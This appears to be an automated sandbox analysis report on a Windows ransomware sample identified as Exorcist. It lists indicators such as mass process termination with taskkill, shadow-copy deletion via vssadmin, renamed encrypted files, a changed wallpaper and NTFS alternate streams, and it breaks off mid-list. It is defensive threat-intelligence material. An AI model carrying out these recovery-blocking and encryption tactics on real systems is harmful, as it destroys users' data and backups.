Analysis
-
max time kernel
112s -
max time network
120s -
platform
windows7_x64 -
resource
win7 -
submitted
23-07-2020 13:40
Static task
static1
Behavioral task
behavioral1
Sample
build-x32.crypt.bin.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
build-x32.crypt.bin.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
build-x32.crypt.bin.exe
Score
10/10
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs
-
Deletes itself 1 IoCs
pid Process 292 cmd.exe -
Kills process with taskkill 91 IoCs
pid Process 1720 taskkill.exe 1544 taskkill.exe 1660 taskkill.exe 1128 taskkill.exe 1860 taskkill.exe 1960 taskkill.exe 1616 taskkill.exe 2036 taskkill.exe 1396 taskkill.exe 1764 taskkill.exe 528 taskkill.exe 1760 taskkill.exe 1440 taskkill.exe 1664 taskkill.exe 1432 taskkill.exe 1088 taskkill.exe 2036 taskkill.exe 1696 taskkill.exe 1584 taskkill.exe 1668 taskkill.exe 668 taskkill.exe 432 taskkill.exe 1592 taskkill.exe 1076 taskkill.exe 1440 taskkill.exe 1760 taskkill.exe 1584 taskkill.exe 1948 taskkill.exe 1856 taskkill.exe 1648 taskkill.exe 2008 taskkill.exe 2040 taskkill.exe 1940 taskkill.exe 1440 taskkill.exe 1696 taskkill.exe 1860 taskkill.exe 316 taskkill.exe 1852 taskkill.exe 2008 taskkill.exe 1108 taskkill.exe 656 taskkill.exe 528 taskkill.exe 1396 taskkill.exe 432 taskkill.exe 2008 taskkill.exe 1916 taskkill.exe 1604 taskkill.exe 1568 taskkill.exe 1536 taskkill.exe 1580 taskkill.exe 1656 taskkill.exe 1608 taskkill.exe 1212 taskkill.exe 1544 taskkill.exe 1916 taskkill.exe 1964 taskkill.exe 1128 taskkill.exe 1760 taskkill.exe 1956 taskkill.exe 1536 taskkill.exe 1856 taskkill.exe 1356 taskkill.exe 1820 taskkill.exe 1580 taskkill.exe 1500 taskkill.exe 1092 taskkill.exe 1764 taskkill.exe 1580 taskkill.exe 2024 taskkill.exe 1524 taskkill.exe 1356 taskkill.exe 1544 taskkill.exe 1648 taskkill.exe 1644 taskkill.exe 1548 taskkill.exe 1828 taskkill.exe 1512 taskkill.exe 520 taskkill.exe 520 taskkill.exe 284 taskkill.exe 1968 taskkill.exe 292 taskkill.exe 1088 taskkill.exe 1828 taskkill.exe 1028 taskkill.exe 1028 taskkill.exe 1988 taskkill.exe 2036 taskkill.exe 1660 taskkill.exe 1076 taskkill.exe 576 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 358 IoCs
pid Process 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe 1124 build-x32.crypt.bin.exe -
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1816 vssadmin.exe -
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ResumeAssert.crw => C:\Users\Admin\Pictures\ResumeAssert.crw.UVvemj build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\ResumeAssert.crw.UVvemj build-x32.crypt.bin.exe File renamed C:\Users\Admin\Pictures\SwitchImport.png => C:\Users\Admin\Pictures\SwitchImport.png.UVvemj build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\SwitchImport.png.UVvemj build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\DisableInitialize.crw.UVvemj build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\EditExpand.png.UVvemj build-x32.crypt.bin.exe File renamed C:\Users\Admin\Pictures\InvokeConvert.tiff => C:\Users\Admin\Pictures\InvokeConvert.tiff.UVvemj build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\InvokeConvert.tiff.UVvemj build-x32.crypt.bin.exe File renamed C:\Users\Admin\Pictures\DisableInitialize.crw => C:\Users\Admin\Pictures\DisableInitialize.crw.UVvemj build-x32.crypt.bin.exe File renamed C:\Users\Admin\Pictures\EditExpand.png => C:\Users\Admin\Pictures\EditExpand.png.UVvemj build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\InvokeConvert.tiff build-x32.crypt.bin.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp" build-x32.crypt.bin.exe -
NTFS ADS 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\boot.sys:ftztnzezfosqioqjq build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:qncbeovltenni build-x32.crypt.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:uzkcayivo build-x32.crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:fwsjvisltoiwhlkd build-x32.crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:uzkcayivo build-x32.crypt.bin.exe -
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
-
Delays execution with timeout.exe 1 IoCs
pid Process 792 timeout.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Suspicious use of WriteProcessMemory 772 IoCs
description pid Process procid_target PID 1124 wrote to memory of 1312 1124 build-x32.crypt.bin.exe 25 PID 1124 wrote to memory of 1312 1124 build-x32.crypt.bin.exe 25 PID 1124 wrote to memory of 1312 1124 build-x32.crypt.bin.exe 25 PID 1124 wrote to memory of 1312 1124 build-x32.crypt.bin.exe 25 PID 1312 wrote to memory of 1476 1312 cmd.exe 27 PID 1312 wrote to memory of 1476 1312 cmd.exe 27 PID 1312 wrote to memory of 1476 1312 cmd.exe 27 PID 1312 wrote to memory of 1476 1312 cmd.exe 27 PID 1124 wrote to memory of 1096 1124 build-x32.crypt.bin.exe 30 PID 1124 wrote to memory of 1096 1124 build-x32.crypt.bin.exe 30 PID 1124 wrote to memory of 1096 1124 build-x32.crypt.bin.exe 30 PID 1124 wrote to memory of 1096 1124 build-x32.crypt.bin.exe 30 PID 1124 wrote to memory of 1536 1124 build-x32.crypt.bin.exe 32 PID 1124 wrote to memory of 1536 1124 build-x32.crypt.bin.exe 32 PID 1124 wrote to memory of 1536 1124 build-x32.crypt.bin.exe 32 PID 1124 wrote to memory of 1536 1124 build-x32.crypt.bin.exe 32 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 34 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 34 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 34 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 34 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 36 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 36 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 36 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 36 PID 1124 wrote to memory of 1808 1124 build-x32.crypt.bin.exe 38 PID 1124 wrote to memory of 1808 1124 build-x32.crypt.bin.exe 38 PID 1124 wrote to memory of 1808 1124 build-x32.crypt.bin.exe 38 PID 1124 wrote to memory of 1808 1124 build-x32.crypt.bin.exe 38 PID 1808 wrote to memory of 1816 1808 cmd.exe 40 PID 1808 wrote to memory of 1816 1808 cmd.exe 40 PID 1808 wrote to memory of 1816 1808 cmd.exe 40 PID 1808 wrote to memory of 1816 1808 cmd.exe 40 PID 1124 wrote to memory of 1660 1124 build-x32.crypt.bin.exe 41 PID 1124 wrote to memory of 1660 1124 build-x32.crypt.bin.exe 41 PID 1124 wrote to memory of 1660 1124 build-x32.crypt.bin.exe 41 PID 1124 wrote to memory of 1660 1124 build-x32.crypt.bin.exe 41 PID 1124 wrote to memory of 1608 1124 build-x32.crypt.bin.exe 43 PID 1124 wrote to memory of 1608 1124 build-x32.crypt.bin.exe 43 PID 1124 wrote to memory of 1608 1124 build-x32.crypt.bin.exe 43 PID 1124 wrote to memory of 1608 1124 build-x32.crypt.bin.exe 43 PID 1608 wrote to memory of 1644 1608 cmd.exe 45 PID 1608 wrote to memory of 1644 1608 cmd.exe 45 PID 1608 wrote to memory of 1644 1608 cmd.exe 45 PID 1608 wrote to memory of 1644 1608 cmd.exe 45 PID 1124 wrote to memory of 1868 1124 build-x32.crypt.bin.exe 47 PID 1124 wrote to memory of 1868 1124 build-x32.crypt.bin.exe 47 PID 1124 wrote to memory of 1868 1124 build-x32.crypt.bin.exe 47 PID 1124 wrote to memory of 1868 1124 build-x32.crypt.bin.exe 47 PID 1868 wrote to memory of 1948 1868 cmd.exe 49 PID 1868 wrote to memory of 1948 1868 cmd.exe 49 PID 1868 wrote to memory of 1948 1868 cmd.exe 49 PID 1868 wrote to memory of 1948 1868 cmd.exe 49 PID 1124 wrote to memory of 1972 1124 build-x32.crypt.bin.exe 50 PID 1124 wrote to memory of 1972 1124 build-x32.crypt.bin.exe 50 PID 1124 wrote to memory of 1972 1124 build-x32.crypt.bin.exe 50 PID 1124 wrote to memory of 1972 1124 build-x32.crypt.bin.exe 50 PID 1972 wrote to memory of 1028 1972 cmd.exe 52 PID 1972 wrote to memory of 1028 1972 cmd.exe 52 PID 1972 wrote to memory of 1028 1972 cmd.exe 52 PID 1972 wrote to memory of 1028 1972 cmd.exe 52 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 53 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 53 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 53 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 53 PID 2020 wrote to memory of 1500 2020 cmd.exe 55 PID 2020 wrote to memory of 1500 2020 cmd.exe 55 PID 2020 wrote to memory of 1500 2020 cmd.exe 55 PID 2020 wrote to memory of 1500 2020 cmd.exe 55 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 56 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 56 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 56 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 56 PID 1432 wrote to memory of 1092 1432 cmd.exe 58 PID 1432 wrote to memory of 1092 1432 cmd.exe 58 PID 1432 wrote to memory of 1092 1432 cmd.exe 58 PID 1432 wrote to memory of 1092 1432 cmd.exe 58 PID 1124 wrote to memory of 1436 1124 build-x32.crypt.bin.exe 59 PID 1124 wrote to memory of 1436 1124 build-x32.crypt.bin.exe 59 PID 1124 wrote to memory of 1436 1124 build-x32.crypt.bin.exe 59 PID 1124 wrote to memory of 1436 1124 build-x32.crypt.bin.exe 59 PID 1436 wrote to memory of 1108 1436 cmd.exe 61 PID 1436 wrote to memory of 1108 1436 cmd.exe 61 PID 1436 wrote to memory of 1108 1436 cmd.exe 61 PID 1436 wrote to memory of 1108 1436 cmd.exe 61 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 62 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 62 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 62 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 62 PID 1512 wrote to memory of 1720 1512 cmd.exe 64 PID 1512 wrote to memory of 1720 1512 cmd.exe 64 PID 1512 wrote to memory of 1720 1512 cmd.exe 64 PID 1512 wrote to memory of 1720 1512 cmd.exe 64 PID 1124 wrote to memory of 1792 1124 build-x32.crypt.bin.exe 65 PID 1124 wrote to memory of 1792 1124 build-x32.crypt.bin.exe 65 PID 1124 wrote to memory of 1792 1124 build-x32.crypt.bin.exe 65 PID 1124 wrote to memory of 1792 1124 build-x32.crypt.bin.exe 65 PID 1792 wrote to memory of 1760 1792 cmd.exe 67 PID 1792 wrote to memory of 1760 1792 cmd.exe 67 PID 1792 wrote to memory of 1760 1792 cmd.exe 67 PID 1792 wrote to memory of 1760 1792 cmd.exe 67 PID 1124 wrote to memory of 1600 1124 build-x32.crypt.bin.exe 68 PID 1124 wrote to memory of 1600 1124 build-x32.crypt.bin.exe 68 PID 1124 wrote to memory of 1600 1124 build-x32.crypt.bin.exe 68 PID 1124 wrote to memory of 1600 1124 build-x32.crypt.bin.exe 68 PID 1600 wrote to memory of 1664 1600 cmd.exe 70 PID 1600 wrote to memory of 1664 1600 cmd.exe 70 PID 1600 wrote to memory of 1664 1600 cmd.exe 70 PID 1600 wrote to memory of 1664 1600 cmd.exe 70 PID 1124 wrote to memory of 1644 1124 build-x32.crypt.bin.exe 71 PID 1124 wrote to memory of 1644 1124 build-x32.crypt.bin.exe 71 PID 1124 wrote to memory of 1644 1124 build-x32.crypt.bin.exe 71 PID 1124 wrote to memory of 1644 1124 build-x32.crypt.bin.exe 71 PID 1644 wrote to memory of 1960 1644 cmd.exe 73 PID 1644 wrote to memory of 1960 1644 cmd.exe 73 PID 1644 wrote to memory of 1960 1644 cmd.exe 73 PID 1644 wrote to memory of 1960 1644 cmd.exe 73 PID 1124 wrote to memory of 1948 1124 build-x32.crypt.bin.exe 74 PID 1124 wrote to memory of 1948 1124 build-x32.crypt.bin.exe 74 PID 1124 wrote to memory of 1948 1124 build-x32.crypt.bin.exe 74 PID 1124 wrote to memory of 1948 1124 build-x32.crypt.bin.exe 74 PID 1948 wrote to memory of 284 1948 cmd.exe 76 PID 1948 wrote to memory of 284 1948 cmd.exe 76 PID 1948 wrote to memory of 284 1948 cmd.exe 76 PID 1948 wrote to memory of 284 1948 cmd.exe 76 PID 1124 wrote to memory of 1028 1124 build-x32.crypt.bin.exe 77 PID 1124 wrote to memory of 1028 1124 build-x32.crypt.bin.exe 77 PID 1124 wrote to memory of 1028 1124 build-x32.crypt.bin.exe 77 PID 1124 wrote to memory of 1028 1124 build-x32.crypt.bin.exe 77 PID 1028 wrote to memory of 2008 1028 cmd.exe 79 PID 1028 wrote to memory of 2008 1028 cmd.exe 79 PID 1028 wrote to memory of 2008 1028 cmd.exe 79 PID 1028 wrote to memory of 2008 1028 cmd.exe 79 PID 1124 wrote to memory of 1500 1124 build-x32.crypt.bin.exe 80 PID 1124 wrote to memory of 1500 1124 build-x32.crypt.bin.exe 80 PID 1124 wrote to memory of 1500 1124 build-x32.crypt.bin.exe 80 PID 1124 wrote to memory of 1500 1124 build-x32.crypt.bin.exe 80 PID 1500 wrote to memory of 1580 1500 cmd.exe 82 PID 1500 wrote to memory of 1580 1500 cmd.exe 82 PID 1500 wrote to memory of 1580 1500 cmd.exe 82 PID 1500 wrote to memory of 1580 1500 cmd.exe 82 PID 1124 wrote to memory of 1092 1124 build-x32.crypt.bin.exe 83 PID 1124 wrote to memory of 1092 1124 build-x32.crypt.bin.exe 83 PID 1124 wrote to memory of 1092 1124 build-x32.crypt.bin.exe 83 PID 1124 wrote to memory of 1092 1124 build-x32.crypt.bin.exe 83 PID 1092 wrote to memory of 1548 1092 cmd.exe 85 PID 1092 wrote to memory of 1548 1092 cmd.exe 85 PID 1092 wrote to memory of 1548 1092 cmd.exe 85 PID 1092 wrote to memory of 1548 1092 cmd.exe 85 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 86 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 86 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 86 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 86 PID 1108 wrote to memory of 1828 1108 cmd.exe 88 PID 1108 wrote to memory of 1828 1108 cmd.exe 88 PID 1108 wrote to memory of 1828 1108 cmd.exe 88 PID 1108 wrote to memory of 1828 1108 cmd.exe 88 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 89 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 89 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 89 PID 1124 wrote to memory of 1720 1124 build-x32.crypt.bin.exe 89 PID 1720 wrote to memory of 1764 1720 cmd.exe 91 PID 1720 wrote to memory of 1764 1720 cmd.exe 91 PID 1720 wrote to memory of 1764 1720 cmd.exe 91 PID 1720 wrote to memory of 1764 1720 cmd.exe 91 PID 1124 wrote to memory of 1760 1124 build-x32.crypt.bin.exe 92 PID 1124 wrote to memory of 1760 1124 build-x32.crypt.bin.exe 92 PID 1124 wrote to memory of 1760 1124 build-x32.crypt.bin.exe 92 PID 